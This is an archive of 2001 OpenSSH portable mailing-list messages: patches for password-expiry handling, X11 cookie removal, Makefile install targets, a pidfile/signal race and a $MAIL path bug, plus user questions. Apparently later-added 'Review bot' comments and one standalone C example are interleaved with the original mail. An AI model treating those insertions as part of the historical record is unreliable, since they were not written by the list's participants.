@@ -596,7 +596,31 @@ void do_exec(Session *s, const char *command) { - if (forced_command) { + if (forced_passwd_change) { + char *user = s->pw->pw_name; + char *msg; + + if (s->ttyfd != -1) { + msg = "Password for %.100s has expired, running 'passwd' to reset it"; + /* + * Can't pass "user" to 'passwd' because Linux doesn't + * allow it. + * Also, the prompt is friendlier without "user". + */ + command = PASSWD_PATH; + } else { + msg = "Password for %.100s has expired and cannot be changed without a pty"; + /* + * Without a pty, Solaris 'passwd' prints "Permission + * denied", but Linux attempts to change the password + * and fails miserably, so echo an error message instead + */ + command = "/bin/sh -c 'echo Permission denied >&2; exit 1'"; + } + log(msg, user); + packet_send_debug(msg, user); + + } else if (forced_command) { original_command = command; command = forced_command; forced_command = NULL; --- configure.in.O Sun Jun 10 12:24:52 2001 +++ configure.in Mon Jun 18 14:27:23 2001 @@ -1304,6 +1304,10 @@ AC_DEFINE_UNQUOTED(RSH_PATH, "$rsh_path") fi +AC_PATH_PROG(PASSWD_PATH, passwd) +AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") + + # Check for mail directory (last resort if we cannot get it from headers) if test ! -z "$MAIL" ; then maildir=`dirname $MAIL` --- acconfig.h.O Tue May 8 15:33:06 2001 +++ acconfig.h Mon Jun 18 14:30:16 2001 @@ -211,6 +211,9 @@ /* Define if rsh is found in your path */ #undef RSH_PATH +/* Define if passwd is found in your path */ +#undef PASSWD_PATH + /* Define if you want to allow MD5 passwords */ #undef HAVE_MD5_PASSWORDS From rjmooney at aboveground.cx Fri Jun 22 04:41:00 2001 
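Review bot: in the auth.c hunk `if ((pw->pw_uid == 0))` has a redundant pair of parentheses, which compilers treat as a hint that an assignment was intended; write `if (pw->pw_uid == 0)`. Since the previous unconditional `return 0` was silent, a log() line explaining that root is refused because its password has expired would also help whoever reads auth.log.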
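Review bot: in the do_exec() hunk the no-pty branch replaces whatever the client asked for, including subsystem requests such as sftp, with the `sh -c 'echo Permission denied >&2; exit 1'` command, which looks intended but deserves a sentence in the description; more importantly the pty branch sets `command = PASSWD_PATH` with no check that it is non-empty, and with the configure.in hunk below PASSWD_PATH can be defined as "" on a host where passwd was not found, so the session would try to exec an empty command. Guard with `#ifdef PASSWD_PATH` (or a runtime check) and fall back to the denial branch.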
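Review bot: in the configure.in hunk AC_PATH_PROG(PASSWD_PATH, passwd) leaves $PASSWD_PATH empty when passwd is not on the path, and the following AC_DEFINE_UNQUOTED then unconditionally defines PASSWD_PATH as ""; wrap it the way the RSH_PATH code just above is wrapped (`if test ! -z "$PASSWD_PATH" ; then AC_DEFINE_UNQUOTED(PASSWD_PATH, "$PASSWD_PATH") fi`) so that session.c can distinguish "not available" from a real path.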
From: rjmooney at aboveground.cx (Robert Mooney)
Date: Thu, 21 Jun 2001 14:41:00 -0400
Subject: SFTP Logging Redux.
In-Reply-To: <20010621105946.D21713@dour.org>
Message-ID:

: A) SSHD always logs. Default level is AUTH.INFO unless otherwise
: specified. Since SSHD always logs, I see no reason why its
: subsystems shouldn't automatically log as well.

You're right. It's always nice to be able to turn stuff off, tho.

: B) I'm not certain how useful part B would be. Are you saying you
: still want it logged but you want to alter the log-string based on a
: verbosity setting (terse versus verbose)? Or do you want the
: LOGLEVEL of the logging to be user-defined?

I meant verbosity, but probably doesn't mean much in this case, since you're not doing a whole lot of logging.

: Agreed. However, as I stated above, this puts SFTP logging in line
: with SSHD logging. I don't see why we should turn it off by
: default, much less HOW given that use of the log() function requires
: logging to be active.

I kind of forgot that adding arguments to sftp-server would complicate matters more than necessary, so in this case, I agree that it should just be left on.

I think there was only one instance that was still logging the old way. I haven't tested it, but it looks much better than the last version.

- Rob

From jason at dour.org Fri Jun 22 05:00:38 2001
From: jason at dour.org (Jason A . Dour)
Date: Thu, 21 Jun 2001 15:00:38 -0400
Subject: SFTP Logging Redux.
In-Reply-To: ; from rjmooney@aboveground.cx on Thu, Jun 21, 2001 at 02:41:00PM -0400
References: <20010621105946.D21713@dour.org>
Message-ID: <20010621150038.A22358@dour.org>

On Thu, Jun 21, 2001 at 02:41:00PM -0400, Robert Mooney wrote:
> I kind of forgot that adding arguments to sftp-server would complicate
> matters more than necessary, so in this case, I agree that it should
> just be left on.

Yeah. There's some stuff I'd like to see for SFTP that might necessitate this, however. chroot() being one (unless there's a plan to offer chroot() for sshd as a whole). If I have to add getopt handling for other reasons, adding one for logging levels would be simple.

> I think there was only one instance that was still logging the old
> way. I haven't tested it, but it looks much better than the last
> version.

There is one line that needs fixing in that last patch. Line 1147 of the patched code should look like:

    cuname = xstrdup(upw->pw_name);

instead of:

    cuname = upw->pw_name;

because the pw entry apparently gets borked temporarily by functions such as chmod(), chown(), et cetera, leading to invalid usernames in log entries. Duping the string keeps it constant as it should be.

It seems to test clean. I've not experienced any trouble with it so far.

Cheers,
Jason
# "Jason A. Dour"                                 http://dour.org/
# Founder / Executive Producer - PJ Harvey Online - http://pjh.org/

From Christopher.Askew at motorola.com Fri Jun 22 05:05:46 2001
From: Christopher.Askew at motorola.com (Askew Christopher-LCA007)
Date: Thu, 21 Jun 2001 15:05:46 -0400
Subject: SSH RFC
Message-ID: <7BF8519B199FD411A3D400D0B76FE77401B89222@ma07exm02.corp.isg.mot.com>

Greetings,

Just wondering if there is an RFC describing the secure shell protocols?

Thanks,
Chris

From Darren.Moffat at eng.sun.com Fri Jun 22 05:08:15 2001
From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Thu, 21 Jun 2001 12:08:15 -0700 (PDT) Subject: SSH RFC Message-ID: <200106211908.f5LJ8xG242272@jurassic.eng.sun.com> >Greetings, > Just wondering if there is an RFC describing the secure shell protocols? A work in progress - it will be more than one RFC though, for more info see the IETF SECSH working group page: http://ietf.org/html.charters/secsh-charter.html -- Darren J Moffat From Alok.Aggarwal at Sun.COM Fri Jun 22 05:41:56 2001 From: Alok.Aggarwal at Sun.COM (Alok Aggarwal) Date: Thu, 21 Jun 2001 12:41:56 -0700 (PDT) Subject: Patch for removing X11 fwding cookies Message-ID: Currently, openssh-2.9p2 adds cookies to a user's .Xauthority file if X11 forwarding is requested but does not delete them while closing down the connection. While this may not necessarily be a security vulnerability, but it's a good idea for the application to cleanup appropriately. This patch takes care of removing the X forwarding cookies from the user's .Xauthority file. Please consider integrating this into the OpenSSH code. Thanks. -Alok diff -w -c openssh-2.9p2/session.c modified/session.c *** 1950,1955 **** --- 1565,1590 ---- void session_close(Session *s) { + char cmd[1024]; + FILE *f = NULL; + int xauth_present = s->auth_proto != NULL && s->auth_data != NULL; + + memset(cmd, 0, sizeof (cmd)); + + if (xauth_present && options.xauth_location != NULL) { + debug("Running %.100s remove %.100s", + options.xauth_location, s->display); + temporarily_use_uid(s->pw->pw_uid); + snprintf(cmd, sizeof (cmd), "%s -q -", + options.xauth_location); + f = popen(cmd, "w"); + if (f) { + fprintf(f, "remove %s\n", s->display); + pclose(f); + } else { + fprintf(stderr, "Could not run %s\n", cmd); + } + restore_uid(); + } session_pty_cleanup(s); session_free(s); session_proctitle(s); *************** From stevesk at pobox.com Fri Jun 22 06:19:19 2001 
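Review bot: the hunk header ranges do not correspond (`*** 1950,1955 ****` against `--- 1565,1590 ----`), so the diff appears to have been taken between two different session.c revisions and may not apply cleanly; regenerate it against one tree. In the body, the return value of pclose() is ignored and the failure path uses fprintf(stderr, ...) rather than error()/debug() like the surrounding sshd code, so an xauth failure during cleanup never reaches the log; check `pclose(f) != 0` and report it through error(). The `memset(cmd, 0, sizeof (cmd))` is redundant because snprintf() NUL-terminates.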
From: stevesk at pobox.com (Kevin Steves)
Date: Thu, 21 Jun 2001 13:19:19 -0700 (PDT)
Subject: pw_expire/pw_change in current portable openssh CVS bombs
In-Reply-To: <20010621115112.A25121@lucent.com>
Message-ID:

On Thu, 21 Jun 2001, Dave Dykstra wrote:
:The references to pw_expire and pw_change in pwcopy() in misc.c cause
:compilation errors at least on solaris. How about doing a memcpy of the
:whole structure and only explicitly setting those that need xstrdup?
:That would work on openbsd and everywhere else.

that will work until they are referenced, at which point we'll still need to have configure define HAVE_FOO and use that around the reference.

From ckraemer at ginko.de Fri Jun 22 05:59:47 2001
From: ckraemer at ginko.de (Christian Kraemer)
Date: Thu, 21 Jun 2001 21:59:47 +0200
Subject: pam session in linux port
Message-ID: <01062122261501.00259@christian.localdomain>

Hi,

Does anybody know why openssh (openssh-2.9p1) on a linux system does not call pam_open_session if no pty is used? In this way the session modules (in /etc/pam.d) are not activated.

This is especially annoying if you use pam_limits.so to set rlimits. Every user could circumvent them easily.

I do not know if this issue has been discussed before and if this behavior is not alright .....

cu Christian

From Greg.Scheidel at ed.gov Fri Jun 22 13:11:11 2001
From: Greg.Scheidel at ed.gov (Scheidel, Greg (Contractor))
Date: Thu, 21 Jun 2001 23:11:11 -0400
Subject: SSH RFC
Message-ID: <2E3AC3356942D511B8A30008C7AAAC08531CF5@wdcrobexc10.ed.gov>

Hopefully not to continue an off-topic e-mail too much... I've seen reference on the list to an 'SSH book'. What exactly is being referred to?

Greg S.

-----Original Message-----
From: Darren Moffat [mailto:Darren.Moffat at eng.sun.com]
Sent: Thursday, June 21, 2001 3:08 PM
To: Christopher.Askew at motorola.com
Cc: openssh-unix-dev at mindrot.org
Subject: Re: SSH RFC

>Greetings,
> Just wondering if there is an RFC describing the secure shell protocols?

A work in progress - it will be more than one RFC though, for more info see the IETF SECSH working group page: http://ietf.org/html.charters/secsh-charter.html

-- 
Darren J Moffat

From djm at mindrot.org Fri Jun 22 13:23:09 2001
From: djm at mindrot.org (Damien Miller)
Date: Fri, 22 Jun 2001 13:23:09 +1000 (EST)
Subject: SSH RFC
In-Reply-To: <2E3AC3356942D511B8A30008C7AAAC08531CF5@wdcrobexc10.ed.gov>
Message-ID:

On Thu, 21 Jun 2001, Scheidel, Greg (Contractor) wrote:
> Hopefully not to continue an off-topic e-mail too much... I've seen
> reference on the list to an 'SSH book'. What exactly is being referred to?

SSH, The Secure Shell: The Definitive Guide
By Daniel J. Barrett & Richard Silverman
http://www.oreilly.com/catalog/sshtdg/

-d
-- 
| Damien Miller \   ``E-mail attachments are the poor man's
| http://www.mindrot.org /   distributed filesystem'' - Dan Geer

From abartlet at pcug.org.au Fri Jun 22 21:13:51 2001
From: abartlet at pcug.org.au (Andrew Bartlett)
Date: Fri, 22 Jun 2001 21:13:51 +1000
Subject: pam session in linux port
References: <01062122261501.00259@christian.localdomain>
Message-ID: <3B33286F.91DCDFF9@bartlett.house>

Christian Kraemer wrote:
> 
> Hi,
> 
> Does anybody know why openssh (openssh-2.9p1) on a linux system does not call
> pam_open_session if no pty is used? In this way the session modules (in
> /etc/pam.d) are not activated.
> 
> This is especially annoying if you
> use pam_limits.so to set rlimits. Every user could
> circumvent them easily.
> 
> I do not know if this issue has been discussed before and if this behavior is
> not alright .....
> 
> cu Christian

I posted a patch to correct this behaviour, but it seems to have been ignored (I've certainly not heard back about it).

Andrew Bartlett

-- 
Andrew Bartlett
abartlet at pcug.org.au
abartlet at samba.org

From jason at dour.org Sat Jun 23 00:02:08 2001
From: jason at dour.org (Jason A . Dour)
Date: Fri, 22 Jun 2001 10:02:08 -0400
Subject: PATCH: Makefile.in more upgrade friendly.
Message-ID: <20010622100208.A23601@dour.org>

Hello again,

In my constant recompiles of 2.9p1 and 2.9p2, I've noticed that upgrading a current installation with a test compile leads to tons of files being updated even when they don't need to be. The attached patch for Makefile.in splits the install-files target into a bunch of separate targets: install-dirs, install-prog, install-man, install-conf, which are then all called in their prior order from install target. This allows a person who is testing new binaries several times an hour to only update the necessary files, say...

    make install-bin

rather than the more broad

    make install-files

Not a big issue. Not really a problem. Just finer-grained install control.

Cheers,
Jason
# "Jason A. Dour"                                 http://dour.org/
# Founder / Executive Producer - PJ Harvey Online - http://pjh.org/

--- Makefile.in.orig	Fri Jun 22 09:53:07 2001
+++ Makefile.in	Fri Jun 22 09:56:17 2001
@@ -164,15 +164,17 @@ distprep: catman-do autoreconf -install: $(TARGETS) install-files host-key +install: $(TARGETS) install-dirs install-prog install-man install-conf host-key -install-files: +install-dirs: $(srcdir)/mkinstalldirs $(DESTDIR)$(bindir) $(srcdir)/mkinstalldirs $(DESTDIR)$(sbindir) $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir) $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir)/$(mansubdir)1 $(srcdir)/mkinstalldirs $(DESTDIR)$(mandir)/$(mansubdir)8 $(srcdir)/mkinstalldirs $(DESTDIR)$(libexecdir) + +install-prog: $(INSTALL) -m $(SSH_MODE) -s ssh $(DESTDIR)$(bindir)/ssh $(INSTALL) -m 0755 -s scp $(DESTDIR)$(bindir)/scp $(INSTALL) -m 0755 -s ssh-add $(DESTDIR)$(bindir)/ssh-add
@@ -182,6 +184,11 @@ $(INSTALL) -m 0755 -s sshd $(DESTDIR)$(sbindir)/sshd @NO_SFTP@$(INSTALL) -m 0755 -s sftp $(DESTDIR)$(bindir)/sftp @NO_SFTP@$(INSTALL) -m 0755 -s sftp-server $(DESTDIR)$(SFTP_SERVER) + -rm -f $(DESTDIR)$(bindir)/slogin + ln -s ssh$(EXEEXT) $(DESTDIR)$(bindir)/slogin + @FILEPRIV@ -f dev,filesys,driver $(DESTDIR)$(bindir)/ssh $(DESTDIR)$(bindir)/slogin + +install-man: $(INSTALL) -m 644 ssh.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/ssh.1 $(INSTALL) -m 644 scp.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/scp.1 $(INSTALL) -m 644 ssh-add.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/ssh-add.1 @@ -191,11 +198,10 @@ $(INSTALL) -m 644 sshd.8.out $(DESTDIR)$(mandir)/$(mansubdir)8/sshd.8 @NO_SFTP@$(INSTALL) -m 644 sftp.1.out $(DESTDIR)$(mandir)/$(mansubdir)1/sftp.1 @NO_SFTP@$(INSTALL) -m 644 sftp-server.8.out $(DESTDIR)$(mandir)/$(mansubdir)8/sftp-server.8 - -rm -f $(DESTDIR)$(bindir)/slogin - ln -s ssh$(EXEEXT) $(DESTDIR)$(bindir)/slogin -rm -f $(DESTDIR)$(mandir)/$(mansubdir)1/slogin.1 ln -s ssh.1 $(DESTDIR)$(mandir)/$(mansubdir)1/slogin.1 - @FILEPRIV@ -f dev,filesys,driver $(DESTDIR)$(bindir)/ssh $(DESTDIR)$(bindir)/slogin + +install-conf: if [ ! -d $(DESTDIR)$(sysconfdir) ]; then \ $(srcdir)/mkinstalldirs $(DESTDIR)$(sysconfdir); \ fi From djast at cs.toronto.edu Fri Jun 22 05:16:35 2001 
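Review bot: in the first hunk the new install-prog, install-man and install-conf targets do not depend on install-dirs, so `make install-prog` on its own against a fresh $(DESTDIR), which is exactly the use case the message describes, fails at the first $(INSTALL) because $(bindir) and $(sbindir) do not exist yet; give each of them an `install-dirs` prerequisite. The old `install-files` target is removed outright; keeping it as `install-files: install-dirs install-prog install-man install-conf` avoids breaking packaging scripts that call it, and the new targets should be listed as .PHONY. Note also that the message says `make install-bin` while the target the hunk defines is `install-prog`.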
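Review bot: the second hunk moves the slogin symlink and the @FILEPRIV@ line into install-prog but leaves the slogin.1 symlink in install-man, which is consistent (binaries with binaries, manpages with manpages); the `+` blank lines before `+install-man:` and `+install-conf:` should carry no trailing whitespace, which the run-together diff cannot show, so check that before committing.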
From: djast at cs.toronto.edu (Dan Astoorian)
Date: Thu, 21 Jun 2001 15:16:35 -0400
Subject: Bug: OpenSSH (port.) daemon sets $MAIL incorrectly on Solaris (others?)
Message-ID: <01Jun21.151638edt.453134-24698@jane.cs.toronto.edu>

This bug may be specific to the portability releases of OpenSSH. It's minor, but trivially corrected.

I'm observing it under:

* openssh-2.3.0p1 (openssl-0.9.6)
* compiled under Solaris 2.5.1
* running under Solaris 2.5.1 and Solaris 8

The relevant source code does not appear to have changed up to and including openssh-2.9p2.

The bug is that the $MAIL environment variable set by the server contains an extraneous slash between the spool directory and the userid; i.e., "/var/mail//djast" instead of "/var/mail/djast" .

Although this is usually harmless, since the pathname is still valid with the null pathname component, some of my users are reporting that the extra slash confuses rmail under emacs in such a way that it will not read the mailbox.

The cause of the bug is that "defines.h" includes maillock.h, and under Solaris (and possibly other platforms on which HAVE_MAILLOCK_H is defined), /usr/include/maillock.h defines MAILDIR in a manner which includes the trailing slash:

    #define MAILDIR "/var/mail/"
    ...
    #if !defined(_PATH_MAILDIR) && defined(MAILDIR)
    # define _PATH_MAILDIR MAILDIR
    #endif /* !defined(_PATH_MAILDIR) && defined(MAILDIR) */

In session.c, this definition gets used to set the MAIL environment variable:

    snprintf(buf, sizeof buf, "%.200s/%.50s", _PATH_MAILDIR, pw->pw_name);
    child_set_env(&env, &envsize, "MAIL", buf);

This results in the doubled slash.

I can recommend two alternatives to correct the problem.

One trivial workaround for the bug is simply to test whether the last character of MAILDIR is a slash; e.g.:

    snprintf(buf, sizeof buf, "%.200s%.1s%.50s", _PATH_MAILDIR,
        (_PATH_MAILDIR[strlen(_PATH_MAILDIR)-1]=='/')?"":"/", pw->pw_name);
    child_set_env(&env, &envsize, "MAIL", buf);

A different approach to the problem would be to modify the definitions so that the trailing slash is always present in the macro; for instance, by changing "defines.h" to read:

    #ifndef MAIL_DIRECTORY
    # define MAIL_DIRECTORY "/var/spool/mail/"
    #endif
    #ifndef _PATH_MAILDIR
    # define _PATH_MAILDIR MAIL_DIRECTORY
    #endif
    #if !defined(MAILDIR) && defined(_PATH_MAILDIR)
    # define MAILDIR _PATH_MAILDIR "/"
    #endif /* !defined(MAILDIR) && defined(_PATH_MAILDIR) */

and changing the original snprintf() in session.c to use "MAILDIR" in place of "_PATH_MAILDIR," and removing the slash from the format string.

Note, however, that the second proposed solution is riskier, in that it makes the (possibly unfounded) assumption that if MAILDIR is defined on a platform, it will always have a trailing slash, but that _PATH_MAILDIR never will; the first solution adapts to whatever is provided.

Please let me know if you require further information.

Thanks,

-- 
Dan Astoorian               People shouldn't think that it's better to have
Sysadmin, CSLab             loved and lost than never loved at all.  It's
djast at cs.toronto.edu     not, it's better to have loved and won.  All
www.cs.toronto.edu/~djast/  the other options really suck.  --Dan Redican

From bbraun at synack.net Sat Jun 23 05:06:47 2001
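The first of Dan's two fixes, carried out as a small self-contained C example that is not part of the report or of OpenSSH: the original `"%.200s/%.50s"` formatting sits beside a version that inserts the separator only when the mail directory macro does not already end in one, so the same function works with Solaris' `"/var/mail/"` and with a slash-less `_PATH_MAILDIR`. Function names and the static buffers are illustrative.

```c
/* Added example (not code from the report or from session.c): build the
 * MAIL value so that a mail directory with or without a trailing slash
 * yields exactly one separator. Names are illustrative. */
#include <stdio.h>
#include <string.h>

/* The session.c formatting Dan quotes; with a trailing-slash MAILDIR this
 * produces "/var/mail//user". Kept for comparison. */
int
build_mail_path_original(char *buf, size_t buflen, const char *maildir,
    const char *user)
{
	return snprintf(buf, buflen, "%.200s/%.50s", maildir, user);
}

/* Dan's first fix: add the slash only if maildir does not end in one.
 * Returns the snprintf-style length so the caller can detect truncation. */
int
build_mail_path(char *buf, size_t buflen, const char *maildir,
    const char *user)
{
	size_t dlen = strlen(maildir);
	const char *sep = (dlen > 0 && maildir[dlen - 1] == '/') ? "" : "/";

	return snprintf(buf, buflen, "%.200s%s%.50s", maildir, sep, user);
}

/* Wrappers returning a static buffer, handy for quick checks. */
const char *
mail_path_original(const char *maildir, const char *user)
{
	static char buf[300];

	build_mail_path_original(buf, sizeof(buf), maildir, user);
	return buf;
}

const char *
mail_path(const char *maildir, const char *user)
{
	static char buf[300];

	build_mail_path(buf, sizeof(buf), maildir, user);
	return buf;
}

int
main(void)
{
	/* Constructed inputs: Solaris-style macro with a slash, and without. */
	printf("original, \"/var/mail/\": %s\n", mail_path_original("/var/mail/", "djast"));
	printf("fixed,    \"/var/mail/\": %s\n", mail_path("/var/mail/", "djast"));
	printf("fixed,    \"/var/mail\":  %s\n", mail_path("/var/mail", "djast"));
	return 0;
}
```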
From: bbraun at synack.net (Rob Braun) Date: Fri, 22 Jun 2001 13:06:47 -0600 Subject: PATCH: pidfile/sigterm race Message-ID: <200106221906.f5MJ6lN15996@gw.synack.net> If one is using the pidfile as an indicator of sshd's status, it is possible to kill sshd before the sigterm handler gets installed, since the pidfile is written out before the signal handlers are setup. The solution is to simply write the pidfile after the signal handlers are setup. Here's the patch. Rob --- sshd.c.orig Fri Jun 22 11:16:41 2001 +++ sshd.c Fri Jun 22 11:18:32 2001 @@ -857,6 +857,19 @@ if (!num_listen_socks) fatal("Cannot bind any address."); + if (options.protocol & SSH_PROTO_1) + generate_ephemeral_server_key(); + + /* Arrange to restart on SIGHUP. The handler needs listen_sock. */ + signal(SIGHUP, sighup_handler); + + signal(SIGTERM, sigterm_handler); + signal(SIGQUIT, sigterm_handler); + + /* Arrange SIGCHLD to be caught. */ + signal(SIGCHLD, main_sigchld_handler); + + /* Write out the pid file after the sigterm handler is setup */ if (!debug_flag) { /* * Record our pid in /var/run/sshd.pid to make it @@ -871,17 +884,6 @@ fclose(f); } } - if (options.protocol & SSH_PROTO_1) - generate_ephemeral_server_key(); - - /* Arrange to restart on SIGHUP. The handler needs listen_sock. */ - signal(SIGHUP, sighup_handler); - - signal(SIGTERM, sigterm_handler); - signal(SIGQUIT, sigterm_handler); - - /* Arrange SIGCHLD to be caught. */ - signal(SIGCHLD, main_sigchld_handler); /* setup fd set for listen */ fdset = NULL; From stevesk at pobox.com Sat Jun 23 06:06:05 2001 
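Review bot: in the first hunk (@@ -857), the race is closed by the four signal() calls alone, yet generate_ephemeral_server_key() is moved above the pidfile write as well; that is unrelated to the fix, delays writing the pidfile by the key generation time, and widens the diff against the OpenBSD tree that the port tries to keep small. Suggest moving only the block from `signal(SIGHUP, sighup_handler);` through `signal(SIGCHLD, main_sigchld_handler);` and leaving the `if (options.protocol & SSH_PROTO_1)` pair where it was, so the second hunk shrinks to just the signal lines.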
From: stevesk at pobox.com (Kevin Steves)
Date: Fri, 22 Jun 2001 13:06:05 -0700 (PDT)
Subject: 2.9p1 patches
In-Reply-To: <20010520230944.A22638@postal.il.thewrittenword.com>
Message-ID:

thanks, is it possible to separate each change into an individual patch?

On Sun, 20 May 2001 openssh-unix-dev at thewrittenword.com wrote:
:1. Add support for files >2GB via Paul Eggert's AC_SYS_LARGEFILE
: macro. This macro is now part of autoconf 2.50. Because of this,
: "config.h" needs to be included before system headers to get
: the appropriate defines for LFS support.
: openbsd-compat/sigact.c
: configure.in
: acinclude.m4
:2. AIX defines TILDE in . Rename to TILDE_CHAR. Feel
: free to pick a better name.
: openbsd-compat/glob.c

is ioctl.h needed in glob.c? i don't think so. what about just #undef'ing TILDE after includes.h or leave it and live with a redefinition warning? we try to minimize the diff with the openbsd tree.

:3. You should *not* place custom macros in aclocal.m4. They should
: be in acinclude.m4 and then you should use aclocal to generate
: aclocal.m4 from acinclude.m4.
: acinclude.m4
:4. A better --with-pcre and --with-zlib configure test.
: configure.in
:
:Some comments regarding your code in configure.in:
: 1. Hardcoding the need for -lsocket and -lnsl via
: $no_libsocket and $no_libnsl is gross. Doing this means you
: don't know how to write a proper autoconf test to determine
: if these two libraries are needed. The solution is not to
: hack in the value with a case statement but to figure out
: the proper autoconf way of solving the problem, independent
: of the hardcoding the solution for every platform. A solution
: proposed below is:
: AC_CHECK_FUNC(yp_match, , AC_CHECK_LIB(nsl, yp_match))
: AC_CHECK_FUNC(setsockopt, , AC_CHECK_LIB(socket, setsockopt))
: We could probably also add:
: AC_CHECK_FUNC(gethostent, , AC_CHECK_LIB(nsl, gethostent))
: 2.
Checks such as the following are wrong:
: AC_CHECK_LIB(gen, getspnam, LIBS="$LIBS -lgen")
: Don't check if the function exists in the library. Check
: first if the function exists *without* the library and then
: with the library if need be (and, FYI, AC_CHECK_LIB(lib,func)
: will automatically add "-l[lib]" to $LIBS):
: AC_CHECK_FUNC(getspnam, , AC_CHECK_LIB(gen, getspnam))

good suggestions, can you provide patches for them?

:If our autoconf checks aren't correct, let's find out why and fix it.
:I'd like to move in a direction where there are *no* hardcoded case
:statements per platform in configure.in.
:
:--
:albert chin (china at thewrittenword.com)

From pete at more.net Sat Jun 23 06:03:27 2001
From: pete at more.net (pete at more.net)
Date: Fri, 22 Jun 2001 15:03:27 -0500
Subject: rsa_private_decrypt() failed
Message-ID: <20010622150327.E26652@more.net>

Hello,

I'm running several Sparcs with Solaris 2.7 on them. They all have Openssh 2.9 installed, and all work fine. Except one. Every once in a while I get this:

"Disconnecting: Corrupted check bytes on input."

When I truss or I am at the console I get this:

"rsa_private_decrypt() failed"

I've tried reinstalling with OpenSSH 2.5, 2.9 and the commercial versions. I get these errors from Linux and x86 Solaris boxes too in random intervals. It's just this one box.

Obviously it seems like a lib is screwed up. All of my boxes are at the same patch level. I've also installed new OpenSSL and zlib's. I've seen different requests at the OpenSSH site's mailing list archives for a fix, and I haven't found any that work.

I've generated several sets of keys, and replaced all the configs with ones known to work fine everywhere else. Any clues or suggestions would be greatly appreciated.

Thanks,

-- 
Pete Greenwell
System Administrator
Missouri Research and Education Network [MOREnet]
http://www.more.net

From openssh-unix-dev at thewrittenword.com Sat Jun 23 06:12:06 2001
From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com)
Date: Fri, 22 Jun 2001 15:12:06 -0500
Subject: 2.9p1 patches
In-Reply-To: ; from stevesk@pobox.com on Fri, Jun 22, 2001 at 01:06:05PM -0700
References: <20010520230944.A22638@postal.il.thewrittenword.com>
Message-ID: <20010622151206.B11915@superman.il.thewrittenword.com>

On Fri, Jun 22, 2001 at 01:06:05PM -0700, Kevin Steves wrote:
> thanks, is it possible to separate each change into an individual patch?

Sure. I'll do this when syncing up our patches against 2.9p2 this weekend.

> On Sun, 20 May 2001 openssh-unix-dev at thewrittenword.com wrote:
> :1. Add support for files >2GB via Paul Eggert's AC_SYS_LARGEFILE
> : macro. This macro is now part of autoconf 2.50. Because of this,
> : "config.h" needs to be included before system headers to get
> : the appropriate defines for LFS support.
> : openbsd-compat/sigact.c
> : configure.in
> : acinclude.m4
> :2. AIX defines TILDE in . Rename to TILDE_CHAR. Feel
> : free to pick a better name.
> : openbsd-compat/glob.c
> 
> is ioctl.h needed in glob.c? i don't think so. what about just
> #undef'ing TILDE after includes.h or leave it and live with a redefinition
> warning? we try to minimize the diff with the openbsd tree.

glob.c includes "includes.h" which includes . So how about fixing TILDE in the openbsd tree? I'll try without the patch on 2.9p2 and report results.

> :3. You should *not* place custom macros in aclocal.m4. They should
> : be in acinclude.m4 and then you should use aclocal to generate
> : aclocal.m4 from acinclude.m4.
> : acinclude.m4

I'm wrong about this. Because you don't use automake, what you're doing is perfectly OK.

> :Some comments regarding your code in configure.in:
> : 1. Hardcoding the need for -lsocket and -lnsl via
> : $no_libsocket and $no_libnsl is gross. Doing this means you
> : don't know how to write a proper autoconf test to determine
> : if these two libraries are needed.
The solution is not to > : hack in the value with a case statement but to figure out > : the proper autoconf way of solving the problem, independent > : of the hardcoding the solution for every platform. A solution > : proposed below is: > : AC_CHECK_FUNC(yp_match, , AC_CHECK_LIB(nsl, yp_match)) > : AC_CHECK_FUNC(setsockopt, , AC_CHECK_LIB(socket, setsockopt)) > : We could probably also add: > : AC_CHECK_FUNC(gethostent, , AC_CHECK_LIB(nsl, gethostent)) > : 2. Checks such as the following are wrong: > : AC_CHECK_LIB(gen, getspnam, LIBS="$LIBS -lgen") > : Don't check if the function exists in the library. Check > : first if the function exists *without* the library and then > : with the library if need be (and, FYI, AC_CHECK_LIB(lib,func) > : will automatically add "-l[lib]" to $LIBS): > : AC_CHECK_FUNC(getspnam, , AC_CHECK_LIB(gen, getspnam)) > > good suggestions, can you provide patches for them? Ok. -- albert chin (china at thewrittenword.com) From ayamura at ayamura.org Sat Jun 23 06:40:36 2001 From: ayamura at ayamura.org (Ayamura KIKUCHI) Date: Sat, 23 Jun 2001 05:40:36 +0900 (JST) Subject: PATCH: pidfile/sigterm race Message-ID: <200106222040.f5MKeakZ011119@mail.ayamura.org> Some systems do not have pw_expire/pw_change fields in the passwd structure. openssh_cvs/misc.c: copy->pw_gecos = xstrdup(pw->pw_gecos); copy->pw_uid = pw->pw_uid; copy->pw_gid = pw->pw_gid; +#ifdef HAVE_PW_EXPIRE_IN_PASSWD copy->pw_expire = pw->pw_expire; +#endif +#ifdef HAVE_PW_CHANGE_IN_PASSWD copy->pw_change = pw->pw_change; +#endif #ifdef HAVE_PW_CLASS_IN_PASSWD copy->pw_class = xstrdup(pw->pw_class); #endif -- ayamura From stevesk at pobox.com Sat Jun 23 06:55:58 2001 
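Review bot: the new HAVE_PW_EXPIRE_IN_PASSWD and HAVE_PW_CHANGE_IN_PASSWD guards in misc.c have no matching configure check in the patch; unless configure.in gains tests that define them (following the existing HAVE_PW_CLASS_IN_PASSWD check visible in the same context), the `copy->pw_expire` and `copy->pw_change` assignments become dead code on every platform, including the BSDs that do have the fields, and the copied passwd silently loses them. Please post the configure.in part together with this hunk.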
